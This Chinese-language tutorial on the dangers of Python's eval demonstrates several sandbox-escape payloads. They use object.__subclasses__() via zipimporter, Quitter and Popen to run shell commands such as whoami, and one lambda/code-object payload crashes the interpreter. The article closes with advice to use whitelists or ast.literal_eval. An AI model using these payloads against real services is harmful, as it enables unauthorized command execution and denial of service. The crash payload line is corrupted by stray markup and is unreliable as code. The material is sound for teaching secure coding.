Python中eval帶來的潛在風險
0x00 前言
eval是Python用於執行python表示式的一個內建函式,使用eval,可以很方便的將字串動態執行。比如下列程式碼:
#!python
>>> eval("1+2")
3
>>> eval("[x for x in range(10)]")
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
當記憶體中的內建模組含有os的話,eval同樣可以做到命令執行:
#!python
>>> import os
>>> eval("os.system('whoami')")
win-20140812chj\administrator
0
當然,eval只能執行Python的表示式型別的程式碼,不能直接用它進行import操作,但exec可以。如果非要使用eval進行import,則使用__import__
:
#!python
>>> exec('import os')
>>> eval('import os')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1
import os
^
SyntaxError: invalid syntax
>>> eval("__import__('os').system('whoami')")
win-20140812chj\administrator
0
在實際的程式碼中,往往有使用客戶端資料帶入eval中執行的需求。比如動態模組的引入,舉個例子,一個線上爬蟲平臺上爬蟲可能有多個並且位於不同的模組中,伺服器端但往往只需要呼叫使用者在客戶端選擇的爬蟲型別,並透過後端的exec或者eval進行動態呼叫,後端編碼實現非常方便。但如果對使用者的請求處理不恰當,就會造成嚴重的安全漏洞。
0x01 “安全”使用eval
現在提倡最多的就是使用eval的後兩個引數來設定函式的白名單:
Eval函式的宣告為eval(expression[, globals[, locals]])
其中,第二三個引數分別指定能夠在eval中使用的函式等,如果不指定,預設為globals()和locals()函式中 包含的模組和函式。
#!python
>>> import os
>>> 'os' in globals()
True
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator
0
>>> eval('os.system(\'whoami\')',{},{})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <module>
NameError: name 'os' is not defined
如果指定只允許呼叫abs函式,可以使用下面的寫法:
#!python
>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system(\'whoami\')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <module>
NameError: name 'os' is not defined
>>> eval('os.system(\'whoami\')')
win-20140812chj\administrator
0
使用這種方法來防護,確實可以起到一定的作用,但是,這種處理方法可能會被繞過
,從而造成其他問題!
0x02 繞過執行程式碼1
被繞過的情景如下,小明知道了eval會帶來一定的安全風險,所以使用如下的手段去防止eval執行任意程式碼:
#!python
env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
eval(users_str, env)
Python中的__builtins__
是內建模組,用來設定內建函式的模組。比如熟悉的abs,open等內建函式,都是在該模組中以字典的方式儲存的,下面兩種寫法是等價的:
#!python
>>> __builtins__.abs(-20)
20
>>> abs(-20)
20
我們也可以自定義內建函式,並像使用Python中的內建函式一樣使用它們:
#!python
>>> def hello():
... print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi
小明將eval函式的作用域中的內建模組設定為None
,好像看起來很徹底了,但依然可以被繞過。__builtins__
是__builtin__
的一個引用,在__main__
模組下,兩者是等價的:
#!python
>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136
根據烏雲drops提到的方法,使用如下程式碼即可:
#!python
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
上面的程式碼首先利用__class__
和__subclasses__
動態載入了object
物件,這是因為eval中無法直接使用object。然後使用object的子類的zipimporter對egg壓縮檔案中的configobj模組進行匯入,並呼叫其內建模組中的os模組從而實現命令執行,當然,前提是要有configobj的egg檔案。 configobj模組很有意思,居然內建了os模組:
#!python
>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chj\administrator
0
和configobj類似的模組如urllib
,urllib2
,setuptools
等都有os的內建,理論上使用哪個都行。 如果無法下載egg壓縮檔案,可以下載帶有setup.py的資料夾,加入:
#!python
from setuptools import setup, find_packages
然後執行:
#!bash
python setup.py bdist_egg
就可以在dist資料夾中找到對應的egg檔案。 繞過demo如下:
#!python
>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chj\administrator
0
>>> eval(users_str, {}, {})
win-20140812chj\administrator
0
0x03 拒絕服務攻擊1
object的子類中有很多有趣的東西,執行以下程式碼檢視:
#!python
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
這裡我就不輸出結果了,如果你執行的話,可以看到很多有趣的模組,比如file,zipimporter,Quitter等。經過測試,file的建構函式是被直譯器沙箱隔離的。 簡單的,或者直接使object暴露出的子類Quitter進行退出:
#!python
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
== 'Quitter'][0](0)()", {'__builtins__':None})
C:/>
如果運氣好,遇到對方程式中匯入了os
等敏感模組,那麼Popen就可以用,並且繞過__builins__
為空的限制,栗子如下:
#!python
>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
<subprocess.Popen object at 0x0324FF70>
>>>
正在 Ping 127.0.0.1 具有 32 位元組的資料:
來自 127.0.0.1 的回覆: 位元組=32 時間<1ms TTL=64
127.0.0.1 的 Ping 統計資訊:
資料包: 已傳送 = 1,已接收 = 1,丟失 = 0 (0% 丟失),
往返行程的估計時間(以毫秒為單位):
最短 = 0ms,最長 = 0ms,平均 = 0ms
>>>
事實上,這種情況非常多,比如匯入os模組,一般用來處理路徑問題。所以說,遇到這種情況,完全可以列舉大量的功能函式,來探測目標object的子類中是否含有一些危險的函式可以直接使用。
0x04 拒絕服務攻擊2
同樣,我們甚至可以繞過__builtins__
為None,造成一次拒絕服務攻擊,Payload(來自老外blog)如下:
#!python
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})
執行上面的程式碼,Python直接crash掉了,造成拒絕服務攻擊。 原理是透過巢狀的lambda來構造一片程式碼段,即code物件。為這個code物件分配空的棧,並給出相應的程式碼字串,這裡是KABOOM
,在空棧上執行程式碼,會出現crash。構造完成後,呼叫fc函式即可觸發,其思路不可謂不淫蕩。
0x05 總結
從上面的內容我們可以看出,單單將內建模組置為空,是不夠的,最好的機制是構造白名單,如果覺得比較麻煩,可以使用ast.literal_eval
代替不安全的eval
。
參考資料:
【1】http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html
【2】/web/?id=7490
【3】http://stackoverflow.com/questions/3513292/python-make-eval-safe
相關文章
- Golang 中 defer Close() 的潛在風險2021-11-22Golang
- "Hotpatch"潛在的安全風險2020-08-19
- python中的風險2019-01-05Python
- AI大模型的潛在風險,如何做好管控?2024-11-15AI大模型
- python中的eval用法2020-11-02Python
- MySQL案例08:MySQL Scheduler Events帶來的風險2018-07-27MySql
- 如何規避MyBatis使用過程中帶來的全表更新風險2023-03-14MyBatis
- 還在使用電子郵件傳輸檔案?警惕它帶來的風險!2020-08-18
- Gmail也出漏洞,郵件潛在的安全風險不得不防2018-11-22AI
- 警惕免費代理IP的潛在風險:如何確保網路安全2023-05-06
- 智盈大師,為股民帶來更多風險保障2021-08-24
- PFMEA在專案風險管理中的應用2021-12-08
- 教你在Python中實現潛在語義分析2018-12-07Python
- Python中eval與exec的使用及區別2018-10-19Python
- Python中eval函式的表示式如何使用2021-12-27Python函式
- 白宮召見科技巨頭!討論AI潛在風險!以確保人們從創新中受益!2023-05-05AI
- 什麼是eval()?eval是用來幹什麼的?2024-07-30
- FMEA技術在IT專案風險管理中的應用2023-11-13
- Python 中 eval 與 exec 的相同點和不同點2024-07-24Python
- IMF報告:加密貨幣不會給全球金融帶來風險2018-05-05加密
- 保險營銷觀察報告:保險直播“帶貨”的現狀、風險分析與未來研判(附下載)2020-10-10
- js中eval詳解,用Js的eval解析JSON中的注意點2018-06-28JSON
- 深度辨析 Python 的 eval() 與 exec()2019-03-24Python
- 遊戲開發者熱議:生成式AI的潛力和風險2023-02-20遊戲開發AI
- 訪問控制中斷的風險2024-01-09
- Python中eval函式是什麼?如何使用?2024-02-18Python函式
- Python中eval如何使用?其作用是什麼?2023-04-04Python
- Python-eval()函式2018-04-27Python函式
- 醫學人工智慧方興未艾,會給患者帶來風險嗎?2020-02-11人工智慧
- 共享賬號,也在同享風險2018-10-26
- Python eval的用法及注意事項2019-04-13Python
- 風帶來的訊息 (狂人日記)2022-05-17
- 【潛力新遊】來一場華麗的猜拳大冒險吧!2024-08-06
- ast.literal_eval替代eval將字串形式的表示式解析為 Python 物件2024-08-21AST字串Python物件
- 物聯網技術的廣泛採用給使用者帶來了額外的風險2022-02-21
- 如何衝破傳統傳輸形態帶來的風險,保護核心研發資料?2024-05-23
- AI技術在基於風險測試模式轉型中的應用2022-12-12AI模式
- 電子商務中潛在的危機2023-02-14